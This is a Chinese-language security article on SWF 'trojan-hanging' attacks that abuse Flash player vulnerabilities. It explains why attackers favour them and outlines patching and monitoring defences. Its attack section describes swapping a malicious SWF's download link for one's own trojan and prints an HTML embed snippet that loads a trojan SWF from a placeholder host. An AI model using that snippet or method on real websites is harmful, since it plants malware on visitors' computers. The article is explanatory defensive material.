利用Flash軟件漏洞的SWF掛馬方式剖析與防范

　　SWF掛馬出現得比較早，以前主要是利用系統漏洞傳播，這種方式跟很多掛馬方式相差無幾，所以並不出眾。直到利用Flash軟件漏洞的SWF掛馬方式出現後，才迅速躥紅，成為主流的掛馬方式之一。為什麼利用Flash軟件漏洞的SWF掛馬方式會這麼厲害呢?下文將一一解答。

　　金山李鐵軍：資深安全工程師，有十余年反病毒經歷。
　　SWF掛馬的危害性很大，為什麼這麼說呢?它有兩個優勢：第一個優勢是，使用SWF文件格式的Flash有著龐大的安裝量，用戶基數大，潛在的可能被黑的用戶量就大。每當Flash新漏洞一出現，SWF掛馬就會沉渣泛起。
　　第二個優勢就是，播放SWF文件是很正常的行為，不會引起用戶的警覺，這樣掛馬的隱蔽性就會非常高。當然，這種掛馬方式的缺點也非常明顯，在大多數用戶安裝了補丁後，成功率就會大大降低。

　　安全百科：SWF是Adobe Flash在網絡中播放時使用的文件格式，也是動畫制作完成後生成的最終格式。Flash的普及程度相當高，絕大部分的網友為了浏覽SWF文件而安裝它。

　　揭示SWF掛馬優勢

　　為什麼黑客會鐘情SWF掛馬呢?因為SWF文件對應的Flash動畫播放軟件是裝機必備的標准軟件之一，如果能夠挖掘到Flash中的漏洞，再配合網頁進行掛馬，自然會肉雞成群。此外，許多人會定期更新Windows的補丁，但是常用軟件卻很少進行更新，這就造成了Flash這樣的漏洞受到黑客的追捧與歡迎。

　　黑客選擇使用Flash的SWF文件掛馬，就如同以前的毒奶粉事件一樣，雖然消費者都很信任正規廠商的奶粉，避免通過其他渠道購買奶粉。但是真奶粉由於自己的質檢漏洞等問題，導致了奶粉中含有有毒成分，最終毒害了消費者。

　　Flash動畫也是如此，很多用戶相信Flash，都會進行安裝，但是由於Flash播放控件也存在漏洞，導致用戶雖然安裝了無毒的Flash控件，但是一樣會遇到利用Flash控件漏洞掛馬的網頁。

　　安全八卦：Flash漏洞曝光後，雖然補丁程序及時發布了，但是仍然有數百萬台沒有及時更新安全補丁的電腦被植入木馬。此外，一些惡意網站也趁火打劫，不管訪問者是否更新了安全補丁，都要求更新網站提供的所謂的安全補丁，其實是病毒。

　　SWF掛馬攻防實錄

　　攻主流的SWF掛馬都是通過Flash漏洞實現的。黑客下載一個惡意的SWF文件，用寫字板打開，找到EXE文件鏈接的地址。黑客只需要將該鏈接地址修改成自己指定的木馬下載地址，再上傳到網站即可。

　　在需要掛馬的網頁中插入：

　　<DIV style="POSITION: absolute;left: 00px">
　　<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6，0，29，0" width="700" height="500">
　　<param name="movie" value="http://www.xxx.com/MuMa.swf SWF木馬網址">
　　<param name="wmode" value="transparent">
　　<embed src=" http://www.xxx.com/MuMa.swf SWF木馬網址" type="application/x-shockwave-flash">
　　</embed>
　　</object>
　　</DIV>

　　此外，黑客還可以使用SWF木馬生成器來掛馬。在生成器中輸入自己指定的木馬下載地址，然後點擊“生成”按鈕，將生成惡意的SWF文件插入需要掛馬的網頁中。

　　防安全工程師在處理SWF掛馬時，首先升級Flash的版本，打上相關的安全補丁，堵住安全漏洞，並會使用一些監控工具，監控公司客戶機常用軟件的升級情況。此外，還可以使用一些能攔截網頁掛馬的安全輔助工具等。

　　安全八卦：由於Flash漏洞的危害性，當漏洞利用程序出現時，在黑客圈甚至被炒到數萬元，但仍不乏購買者。與此同時，Flash漏洞的曝光，也讓黑客圈內的肉雞交易再次火爆，在黑客常用的IRC聊天頻道中，肉雞以數千甚至上萬的數量進行批量交易。